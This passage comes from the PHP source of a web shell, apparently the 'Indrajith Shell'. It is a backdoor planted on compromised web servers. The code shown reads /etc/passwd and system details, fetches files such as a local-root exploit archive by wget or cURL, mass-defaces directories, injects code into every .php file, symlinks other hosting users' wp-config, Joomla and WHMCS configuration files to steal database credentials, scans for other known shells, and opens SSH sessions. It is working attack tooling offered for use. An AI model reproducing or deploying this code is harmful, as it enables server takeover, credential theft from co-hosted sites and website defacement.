  1384.               <tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>".cmd('net user')."</pre></td></tr>
  1385.               ";
  1386.     }
  1387.     if($os=='nix')
  1388.     {
  1389.         echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>".cmd('cat /etc/*-release')."</pre></font></td></tr>
  1390.              <tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>".cmd('cat /etc/issue.net')."</pre></font></td></tr>
  1391.              <tr><td style='text-align:left'>GCC : <font color=7171C6><pre>".cmd('whereis gcc')."</pre></td></tr>
  1392.              <tr><td style='text-align:left'>PERL : <font color=7171C6><pre>".cmd('whereis perl')."</pre></td></tr>
  1393.              <tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>".cmd('whereis python')."</pre></td></tr>
  1394.              <tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>".cmd('whereis java')."</pre></td></tr>
  1395.              <tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>".cmd('whereis apache')."</pre></td></tr>
  1396.              <tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr>
  1397.              <tr><td style='text-align:left'>RAM : <font color=7171C6><pre>".cmd('free -m')."</pre></td></tr>
  1398.              <tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>".cmd('ulimit -a')."</pre></td></tr>";
  1399.               $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  1400.               $uze=array();
  1401.               foreach($useful as $uzeful)
  1402.               {
  1403.                 if(cmd("which $uzeful"))
  1404.                 {
  1405.                     $uze[]=$uzeful;
  1406.                 }
  1407.               }
  1408.               echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>";
  1409.               echo implode(', ',$uze);
  1410.               echo "</pre></td></tr>";
  1411.               $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1412.               $uze=array();
  1413.               foreach($downloaders as $downloader)
  1414.               {
  1415.                 if(cmd("which $downloader"))
  1416.                 {
  1417.                     $uze[]=$downloader;
  1418.                 }
  1419.               }
  1420.               echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>";
  1421.               echo implode(', ',$uze);
  1422.               echo "</pre></td></tr>";
  1423.               echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>".wordwrap(get_users())."</pre</font>></td></tr>
  1424.                    <tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>";
  1425.     }
  1426.     echo "</table><br /><br /><hr /><br /><br />";
  1427. }
  1428.  
  1429. function remote_file_check_ui()
  1430. {
  1431.     echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br />
  1432.          <table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr>
  1433.          <tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.php
  1434. ajithkp560.php
  1435. index.html
  1436. profile.php
  1437. c99.php
  1438. r57.php</textarea></td></tr>
  1439.         <tr><td><br /><input type='submit' value='   >>   ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1440. }
  1441.  
  1442. function remote_file_check_bg()
  1443. {
  1444.     set_time_limit(0);
  1445.     $rtr=array();
  1446.     echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>";
  1447.     $webz=$_POST['rem_web'];
  1448.     $uri_in=$_POST['tryzzz'];
  1449.     $r_xuri = trim($uri_in);
  1450.     $r_xuri=explode("\n", $r_xuri);
  1451.     foreach($r_xuri as $rty)
  1452.     {
  1453.         $urlzzx=$webz.$rty;
  1454.         if(function_exists('curl_init'))
  1455.         {
  1456.             echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1457.             $ch = curl_init($urlzzx);
  1458.             curl_setopt($ch, CURLOPT_NOBODY, true);
  1459.             curl_exec($ch);
  1460.             $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1461.             curl_close($ch);
  1462.             if($status_code==200)
  1463.             {
  1464.                 echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1465.             }
  1466.             else
  1467.             {
  1468.                 echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1469.             }
  1470.         }
  1471.         else
  1472.         {
  1473.             echo "<font color=red>cURL Not Found </font>";
  1474.             break;
  1475.         }
  1476.     }
  1477.     echo "</table><br /><br /><hr /><br /><br /></div>";
  1478. }
  1479.  
  1480. function remote_download_ui()
  1481. {
  1482.     echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=".getcwd()."><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
  1483.    <tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr>
  1484.    <tr><td><input type='submit' class='input_big' value='   >>   ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1485. }
  1486.  
  1487. function remote_download_bg()
  1488. {
  1489.     chdir($_GET['path']);
  1490.     global $os;
  1491.     $opt=$_GET['type_r_down'];
  1492.     $rt_ffile=$_GET['rurlfile'];
  1493.     $name=basename($rt_ffile);
  1494.     echo "<div id=result>";
  1495.     switch($opt)
  1496.     {
  1497.         case "WGET":
  1498.             if($os!='win')
  1499.             {
  1500.                 cmd("wget $rt_ffile");
  1501.                 alert("Downloaded Successfully...");
  1502.             }
  1503.             else
  1504.             {
  1505.                 alert("Its Windows OS... WGET is not available");
  1506.             }
  1507.             break;
  1508.         case "cURL":
  1509.             if(function_exists('curl_init'))
  1510.             {
  1511.                 $ch = curl_init($rt_ffile);
  1512.                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1513.                 $data = curl_exec($ch);
  1514.                 curl_close($ch);
  1515.                 file_put_contents($name, $data);
  1516.                 alert("Download succeeded");
  1517.             }
  1518.             else
  1519.             {
  1520.                 alert("cURL Not Available");
  1521.             }
  1522.             break;
  1523.     }
  1524.     echo "</div>";
  1525. }
  1526.  
  1527. function hex_encode_ui()
  1528. {
  1529.     if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx']))
  1530.     {
  1531.         $tyx=$_POST['tyxxx'];
  1532.         $rezultzz=$_POST['hexinp'];
  1533.         switch($tyx)
  1534.         {
  1535.             case "Encode":
  1536.                 $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz);
  1537.                 echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1538.                <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1539.                <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1540.                Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1541.                 break;
  1542.             case "Decode":
  1543.                 $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz);
  1544.                 echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1545.                <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1546.                <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1547.                Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1548.                 break;
  1549.         }
  1550.     }
  1551.     else
  1552.     {
  1553.         echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1554.        <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea>
  1555.        <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1556.        Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1557.     }
  1558. }
  1559.  
  1560. function killme()
  1561. {
  1562.     global $self;
  1563.     echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... :( Hope You Like me...<br /><br /><br/><hr /><br /><br />";
  1564.     $me=basename($self);
  1565.     unlink($me);
  1566. }
  1567.  
  1568. function ftp_anonymous_ui()
  1569. {
  1570.     echo "<div id='result'><center><h2>Anonymous FTP Scanner</h2><hr /></center><table class=tbl><form method='GET'><tr><td><textarea name='ftp_anonz' cols=40 rows=25 class='textarea_edit'>127.0.0.1
  1571. ftp.google.com
  1572. ftp.r00t.com
  1573. ftp.ajithkp.org
  1574. ...
  1575. ...</textarea></td></tr><tr><td><input class='input_big' type='submit' value='   >>   ' /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1576. }
  1577.  
  1578. function ftp_anonymous_bg()
  1579. {
  1580.     echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=table>";
  1581.     $ftp_list=$_GET['ftp_anonz'];
  1582.     $xftpl = trim($ftp_list);
  1583.     $xftpl = explode("\n", $xftpl);
  1584.     foreach($xftpl as $xftp)
  1585.     {
  1586.         $xftp = str_replace("ftp://", "", $xftp);
  1587.         $conn_ftp = ftp_connect($xftp);
  1588.         $success = ftp_login($conn_ftp, "anonymous", "");
  1589.         if($success)
  1590.         {
  1591.             echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=green>Successfull</font></td></tr>";
  1592.         }
  1593.         else
  1594.         {
  1595.             echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=red>Failed</font></td></tr>";
  1596.         }
  1597.        
  1598.     }
  1599.     echo "</table><br /><br /><hr /><br /><br />";
  1600. }
  1601.  
  1602. function mass_deface_ui()
  1603. {
  1604.     echo "<div id=result><center><h2>Mass Deface</h2><hr /><br /><br /><table class=tbl><form method='GET'><input name='mm_path' type='hidden' value=".$_GET['path']."><tr><td>Name : <input size=40 name='mass_name'></td></tr>
  1605.    <tr><td><textarea name='mass_cont' cols=80 rows=25 class='textarea_edit'></textarea></td></tr><tr><td><input class='input_big' type=submit value='   >>   ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1606. }
  1607.  
  1608. function mass_deface_bg()
  1609. {
  1610.     global $sep;
  1611.     $d_path=$_GET['mm_path'];
  1612.     chdir($d_path);
  1613.     $d_file=$_GET['mass_name'];
  1614.     $d_conten=$_GET['mass_cont'];
  1615.     if(is_dir($d_path))
  1616.     {
  1617.         chdir($d_path);
  1618.         $d_dirs=array();
  1619.         if($handle=opendir($d_path))
  1620.         {
  1621.             while(($item=readdir($handle))!==FALSE)
  1622.             {
  1623.                 if($item=="."){continue;}
  1624.                 if($item==".."){continue;}
  1625.                 if(is_dir($item))
  1626.                 {
  1627.                     array_push($d_dirs, $item);
  1628.                 }
  1629.             }
  1630.         }
  1631.     }
  1632.     echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=tbl>";
  1633.     foreach($d_dirs as $d_dir)
  1634.     {
  1635.         $xd_path=getcwd()."$sep$d_dir$sep$d_file";
  1636.         if(is_writable($d_dir))
  1637.         {
  1638.             $handle=fopen($xd_path, "wb");
  1639.             if($handle)
  1640.             {
  1641.                 fwrite($handle, $d_conten);
  1642.             }
  1643.         }
  1644.         echo "<tr><td><font color=green>$xd_path</font></td></tr>";
  1645.     }
  1646.     echo "</table><br /><br /><hr /><br /><br /></div>";
  1647. }
  1648.  
  1649.  
  1650. function symlinkg($usernamexx,$domainxx)
  1651. {
  1652.         symlink('/home/'.$usernamexx.'/public_html/vb/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin1.txt');
  1653.         symlink('/home/'.$usernamexx.'/public_html/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin2.txt');
  1654.         symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin3.txt');
  1655.         symlink('/home/'.$usernamexx.'/public_html/cc/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin4.txt');
  1656.         symlink('/home/'.$usernamexx.'/public_html/inc/config.php','Indrajith/'.$domainxx.' =>mybb.txt');
  1657.         symlink('/home/'.$usernamexx.'/public_html/config.php','Indrajith/'.$domainxx.' =>Phpbb1.txt');
  1658.         symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>Phpbb2.txt');
  1659.         symlink('/home/'.$usernamexx.'/public_html/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress1.txt');
  1660.         symlink('/home/'.$usernamexx.'/public_html/blog/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress2.txt');
  1661.         symlink('/home/'.$usernamexx.'/public_html/configuration.php','Indrajith/'.$domainxx.' =>Joomla1.txt');
  1662.         symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php','Indrajith/'.$domainxx.' =>Joomla2.txt');
  1663.         symlink('/home/'.$usernamexx.'/public_html/joomla/configuration.php','Indrajith/'.$domainxx.' =>Joomla3.txt');
  1664.         symlink('/home/'.$usernamexx.'/public_html/whm/configuration.php','Indrajith/'.$domainxx.' =>Whm1.txt');
  1665.         symlink('/home/'.$usernamexx.'/public_html/whmc/configuration.php','Indrajith/'.$domainxx.' =>Whm2.txt');
  1666.         symlink('/home/'.$usernamexx.'/public_html/support/configuration.php','Indrajith/'.$domainxx.' =>Whm3.txt');
  1667.         symlink('/home/'.$usernamexx.'/public_html/client/configuration.php','Indrajith/'.$domainxx.' =>Whm4.txt');
  1668.         symlink('/home/'.$usernamexx.'/public_html/billings/configuration.php','Indrajith/'.$domainxx.' =>Whm5.txt');
  1669.         symlink('/home/'.$usernamexx.'/public_html/billing/configuration.php','Indrajith/'.$domainxx.' =>Whm6.txt');
  1670.         symlink('/home/'.$usernamexx.'/public_html/clients/configuration.php','Indrajith/'.$domainxx.' =>Whm7.txt');
  1671.         symlink('/home/'.$usernamexx.'/public_html/whmcs/configuration.php','Indrajith/'.$domainxx.' =>Whm8.txt');
  1672.         symlink('/home/'.$usernamexx.'/public_html/order/configuration.php','Indrajith/'.$domainxx.' =>Whm9.txt');
  1673.         symlink('/home/'.$usernamexx.'/public_html/admin/conf.php','Indrajith/'.$domainxx.' =>5.txt');
  1674.         symlink('/home/'.$usernamexx.'/public_html/admin/config.php','Indrajith/'.$domainxx.' =>4.txt');
  1675.         symlink('/home/'.$usernamexx.'/public_html/conf_global.php','Indrajith/'.$domainxx.' =>invisio.txt');
  1676.         symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>7.txt');
  1677.         symlink('/home/'.$usernamexx.'/public_html/connect.php','Indrajith/'.$domainxx.' =>8.txt');
  1678.         symlink('/home/'.$usernamexx.'/public_html/mk_conf.php','Indrajith/'.$domainxx.' =>mk-portale1.txt');
  1679.         symlink('/home/'.$usernamexx.'/public_html/include/config.php','Indrajith/'.$domainxx.' =>12.txt');
  1680.         symlink('/home/'.$usernamexx.'/public_html/settings.php','Indrajith/'.$domainxx.' =>Smf.txt');
  1681.         symlink('/home/'.$usernamexx.'/public_html/includes/functions.php','Indrajith/'.$domainxx.' =>phpbb3.txt');
  1682.         symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>infinity.txt');
  1683. }
  1684.  
  1685. function config_grabber_bg()
  1686. {
  1687.     global $sym_htaccess,$sym_php_ini;
  1688.     mkdir('INDRAJITH', 0777);
  1689.     symlink("/", "INDRAJITH/root");
  1690.     $htaccess=fopen('INDRAJITH/.htaccess', 'wb');
  1691.     fwrite($htaccess,$sym_htaccess);
  1692.     $php_ini_x=fopen('INDRAJITH/php.ini', 'wb');
  1693.     fwrite($php_ini_x, $sym_php_ini);
  1694.     $usr=explode("\n",$_POST['user_z_list']);
  1695.     foreach($usr as $uzer)
  1696.     {
  1697.         $u_er=trim($uzer);
  1698.         symlinggg($u_er);
  1699.     }
  1700.     echo "<script>window.open('INDRAJITH/', '_blank');</script>";
  1701.     alert('Config Grab compted. Check configs in direcory INDRAJITH');
  1702. }
  1703.  
  1704. if(isset($_POST['user_z_list']))
  1705. {
  1706.     config_grabber_bg();
  1707. }
  1708.  
  1709.  
  1710. function config_grabber_ui()
  1711. {
  1712.     if(file('/etc/passwd'))
  1713.     {
  1714.         ?><script>alert("/etc/named.conf Not Found, Its alternative method.");</script><div id=result><center><h2>Config Grabber</h2><hr /><br /><br /><table class=tbl><form method=POST><tr><td><textarea spellcheck=false class='textarea_edit' rows=15 cols=60  name=user_z_list><?php
  1715.         $users = file('/etc/passwd');
  1716.         foreach($users as $user)
  1717.         {
  1718.             $user = explode(':', $user);
  1719.             echo $user[0]."\n";
  1720.         }
  1721.         ?></textarea></td></tr><tr><td><input type='submit' class='input_big' value='   >>   '/></td></tr></form></table><br /><br /><hr /><br /><br /><hr /></div><?php
  1722.     }
  1723.     else
  1724.     {
  1725.         alert(" File Not Found : /etc/passwd ");
  1726.     }
  1727. }
  1728.  
  1729. function symlinggg($user)
  1730. {
  1731.     symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php', "INDRAJITH/".$user." =>blog/configuration.php");
  1732.     symlink('/home/'.$user.'/public_html/forum/includes/config.php', "INDRAJITH/".$user." =>forum/includes/config.php");
  1733.     symlink("/home/".$user."/public_html/wp-config.php", "INDRAJITH/".$user." =>wp-config.php");
  1734.     symlink("/home/".$user."/public_html/wordpress/wp-config.php", "INDRAJITH/".$user." =>wordpress/wp-config.php");
  1735.     symlink("/home/".$user."/public_html/configuration.php", "INDRAJITH/".$user." =>configuration.php");
  1736.     symlink("/home/".$user."/public_html/blog/wp-config.php", "INDRAJITH/".$user." =>blog/wp-config.php");
  1737.     symlink("/home/".$user."/public_html/joomla/configuration.php", "INDRAJITH/".$user." =>joomla/configuration.php");
  1738.     symlink("/home/".$user."/public_html/vb/includes/config.php", "INDRAJITH/".$user." =>vb/includes/config.php");
  1739.     symlink("/home/".$user."/public_html/includes/config.php", "INDRAJITH/".$user." =>includes/config.php");
  1740.     symlink("/home/".$user."/public_html/conf_global.php", "INDRAJITH/".$user." =>conf_global.php");
  1741.     symlink("/home/".$user."/public_html/inc/config.php", "INDRAJITH/".$user." =>inc/config.php");
  1742.     symlink("/home/".$user."/public_html/config.php", "INDRAJITH/".$user." =>config.php");
  1743.     symlink("/home/".$user."/public_html/Settings.php", "INDRAJITH/".$user." =>/Settings.php");
  1744.     symlink("/home/".$user."/public_html/sites/default/settings.php", "INDRAJITH/".$user." =>sites/default/settings.php");
  1745.     symlink("/home/".$user."/public_html/whm/configuration.php", "INDRAJITH/".$user." =>whm/configuration.php");
  1746.     symlink("/home/".$user."/public_html/whmcs/configuration.php", "INDRAJITH/".$user." =>whmcs/configuration.php");
  1747.     symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
  1748.     symlink("/home/".$user."/public_html/whmc/WHM/configuration.php", "INDRAJITH/".$user." =>whmc/WHM/configuration.php");
  1749.     symlink("/home/".$user."/public_html/whm/WHMCS/configuration.php", "INDRAJITH/".$user." =>whm/WHMCS/configuration.php");
  1750.     symlink("/home/".$user."/public_html/whm/whmcs/configuration.php", "INDRAJITH/".$user." =>whm/whmcs/configuration.php");
  1751.     symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
  1752.     symlink("/home/".$user."/public_html/clients/configuration.php", "INDRAJITH/".$user." =>clients/configuration.php");
  1753.     symlink("/home/".$user."/public_html/client/configuration.php", "INDRAJITH/".$user." =>client/configuration.php");
  1754.     symlink("/home/".$user."/public_html/clientes/configuration.php", "INDRAJITH/".$user." =>clientes/configuration.php");
  1755.     symlink("/home/".$user."/public_html/cliente/configuration.php", "INDRAJITH/".$user." =>cliente/configuration.php");
  1756.     symlink("/home/".$user."/public_html/clientsupport/configuration.php", "INDRAJITH/".$user." =>clientsupport/configuration.php");
  1757.     symlink("/home/".$user."/public_html/billing/configuration.php", "INDRAJITH/".$user." =>billing/configuration.php");
  1758.     symlink("/home/".$user."/public_html/admin/config.php", "INDRAJITH/".$user." =>admin/config.php");
  1759. }
  1760.  
  1761. function sym_xxx()
  1762. {
  1763.     global $sym_htaccess,$sym_php_ini;
  1764.     mkdir('Indrajith', 0777);
  1765.     symlink("/", "Indrajith/root");
  1766.     $htaccess=@fopen('Indrajith/.htaccess', 'w');
  1767.     fwrite($htaccess,$sym_htaccess);
  1768.     $php_ini_x=fopen('Indrajith/php.ini', 'w');
  1769.     fwrite($php_ini_x, $sym_php_ini);
  1770.     $akps = implode(file("/etc/named.conf"));
  1771.     if(!$akps)
  1772.     {
  1773.         config_grabber_ui();
  1774.     }
  1775.     else
  1776.     {
  1777.     $usrd = array();
  1778.     foreach($akps as $akp)
  1779.     {
  1780.         if(eregi("zone", $akp))
  1781.         {
  1782.             preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1783.             flush();
  1784.             if(strlen(trim($akpzz[1][0]))>2)
  1785.             {
  1786.                 $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1787.                 symlinkg($akpzz[1][0],$user['name']);
  1788.                 flush();
  1789.             }
  1790.         }
  1791.     }
  1792.     }
  1793. }
  1794.  
  1795. function sym_link()
  1796. {
  1797.     global $sym_htaccess,$sym_php_ini;
  1798.     cmd('rm -rf AKP');
  1799.     mkdir('AKP', 0755);
  1800.     $usrd = array();
  1801.     $akps = implode(file("/etc/named.conf"));
  1802.     $htaccess=fopen('AKP/.htaccess', 'w');
  1803.     fwrite($htaccess,$sym_htaccess);
  1804.     $php_ini_x=fopen('AKP/php.ini', 'w');
  1805.     fwrite($php_ini_x, $sym_php_ini);
  1806.     symlink("/", "AKP/root");
  1807.     if(!$file)
  1808.     {
  1809.         echo "<script>alert('Bind File /etc/passwd Not Found. Its alternative Method')</script>";
  1810.         echo "<div id=result><center><h2>SymLink</h2></center><hr /><br /><br /><table class='table'><tr><th>Users</th><th>Exploit</th></tr>";
  1811.         $users = file('/etc/passwd');
  1812.         foreach($users as $user)
  1813.         {
  1814.             $user = explode(':', $user);
  1815.             echo "<tr><td>".$user[0]."</td><td><a href='AKP/root/home/".$user[0]."/public_html/' target=_blank>SymLink</tr>";
  1816.         }
  1817.         echo "</table><br /><br /><hr /><br /><br /></div>";
  1818.        
  1819.     }
  1820.     else
  1821.     {
  1822.         echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
  1823.         foreach($akps as $akp)
  1824.         {
  1825.             if(eregi("zone", $akp))
  1826.             {
  1827.                 preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1828.                 flush();
  1829.                 if(strlen(trim($akpzz[1][0]))>2)
  1830.                 {
  1831.                     $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1832.                     echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."</td><td><a href='AKP/root/home/".$user['name']."/public_html/' target=_blank>SymLink</a></td></tr></table>";
  1833.                     flush();
  1834.                 }
  1835.             }
  1836.         }
  1837.     }
  1838. }
  1839.  
  1840. function shell_finder_ui()
  1841. {
  1842.     echo "<div id=result><center><h2>SH3LL SCANNER</h2><hr /><br /><br /><br /><form method='GET'>URL : <input size=50 name='sh311_scanx' value='http://www.ajithkp560.hostei.com/PHP/'><input type='submit' value='   >>  ' /></form><br /><br /><hr /><br /><br />";
  1843. }
  1844.  
  1845. function shell_finder_bg()
  1846. {
  1847.     $sh_url=$_GET['sh311_scanx'];
  1848.     echo "<div id=result><center><h2>SHELL SCAN</h2><hr /><br /><br /><table class='table'>";
  1849.     $ShellZ=array("indrajith.php", "c99.php", "c100.php","r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php","cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php");
  1850.     foreach($ShellZ as $shell)
  1851.     {
  1852.         $urlzzx=$sh_url.$shell;
  1853.         if(function_exists('curl_init'))
  1854.         {
  1855.             echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1856.             $ch = curl_init($urlzzx);
  1857.             curl_setopt($ch, CURLOPT_NOBODY, true);
  1858.             curl_exec($ch);
  1859.             $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1860.             curl_close($ch);
  1861.             if($status_code==200)
  1862.             {
  1863.                 echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1864.             }
  1865.             else
  1866.             {
  1867.                 echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1868.             }
  1869.         }
  1870.         else
  1871.         {
  1872.             echo "<font color=red>cURL Not Found </font>";
  1873.             break;
  1874.         }
  1875.     }
  1876.     echo "</table><br /><br /><hr /><br /><br /></div>";
  1877. }
  1878.  
  1879. function code_in_ui()
  1880. {
  1881.     global $sep;
  1882.     $mode=$_POST['modexxx'];
  1883.     $ftype=$_POST['ffttype'];
  1884.     $c_cont=$_POST['code_cont'];
  1885.     $ppp=$_POST['path'];
  1886.     if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode!="" && $ftype!="" && $c_cont!="" && $ppp!="")
  1887.     {
  1888.         echo "<div id=result><center><h2>Successfully c0d3 inj3cted</h2></center><table class=tbl>";
  1889.         switch($mode)
  1890.         {
  1891.             case "Apender":
  1892.                 $mmode="a";
  1893.                 break;
  1894.             case "Rewrite":
  1895.                 $mmode="w";
  1896.                 break;
  1897.         }
  1898.         if($handle = opendir($ppp))
  1899.         {
  1900.             while(($c_file = readdir($handle)) !== False)
  1901.             {
  1902.                 if((preg_match("/$ftype".'$'.'/', $c_file , $matches) != 0) && (preg_match('/'.$c_file.'$/', $self , $matches) != 1))
  1903.                 {
  1904.                     echo "<tr><td><font color=red>$ppp$sep$c_file</font></td></tr>";
  1905.                     $fd = fopen($ppp.$sep.$c_file,$mmode);
  1906.                     if($fd)
  1907.                     {
  1908.                         fwrite($fd,$c_cont);
  1909.                     }
  1910.                     else
  1911.                     {
  1912.                         alert("Error. Access Denied");
  1913.                     }
  1914.                 }
  1915.             }
  1916.         }
  1917.         echo "</table><br /><br /><hr /><br /><br /></div>";
  1918.     }
  1919.     else
  1920.     {
  1921.     ?>
  1922.         <div id=result><center><h2>c0de inj3ct</h2></center><hr /><br /><br /><table class=table><form method='POST'><input type='hidden' name='path' value="<?php echo getcwd(); ?>"><tr><td>Mode : </td>
  1923.         <td><select style='color:green; background-color:black; border:1px solid #666;' name='modexxx'><option>Apender</option><option>Rewrite</option></select></td></tr><tr><td>File Type</td><td><input name='ffttype' value='.php' size=50></td></tr>
  1924.         <tr><td>Content : </td><td><textarea name='code_cont' rows=20 cols=60 class='textarea_edit'></textarea></td></tr><tr><td></td><td><input type=submit value='   >>   ' class='input_big' /></td></tr></form></table><br /><br /><hr /><br /><br />
  1925.     <?php
  1926.     }
  1927. }
  1928.  
  1929. function ssh_man_ui()
  1930. {
  1931.     ?>
  1932.     <div id=result><center><h2>SSH Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ssh_host'></td></tr><tr><td>Username : </td><td><input size=50 name='ssh_user'></td></tr><tr><td>Password : </td><td><input size=50 name='ssh_pass'></td></tr><tr><td></td><td><input type='submit' value='   >>   ' /></form></table></center><br /><br /><hr /><br /><br /></div>
  1933.     <?php
  1934. }
  1935.  
  1936. function ssh_man_bg()
  1937. {
  1938.     $ssh_h=$_GET['ssh_host'];
  1939.     $ssh_u=$_GET['ssh_user'];
  1940.     $ssh_p=$_GET['ssh_pass'];
  1941.     if(!function_exists('ssh2_connect'))
  1942.     {
  1943.         alert("Sorry, Function ssh2_connect is not found");
  1944.     }
  1945.     $conn=ssh2_connect($ssh_h, 22);
  1946.     if(!$conn)
  1947.     {
  1948.         alert("SSH Host Not Found");
  1949.     }
  1950.     $log=ssh2_auth_password($conn, $ssh_u, $ssh_p);
  1951.     if(!$log)
  1952.     {
  1953.         alert("SSH Authorication failed");
  1954.     }
  1955.     $shell=ssh2_shell($conn, "bash");
  1956.     if($_GET['ssh_cmd']!="" && $_GET['ssh_cmd'])
  1957.     {
  1958.         $ssh_cmd=$_GET['ssh_cmd'];
  1959.         fwrite($shell, $ssh_cmd);
  1960.         sleep(1);
  1961.         while($line=fgets($shell))
  1962.         {
  1963.             flush();
  1964.             echo $line."\n";
  1965.         }
  1966.         ?>
  1967.     <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
  1968.     <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value='   >>   ' /></form></center><br /><br /><hr /><br /><br /></div>
  1969.         <?php
  1970.     }
  1971.     else
  1972.     {
  1973.     ?>
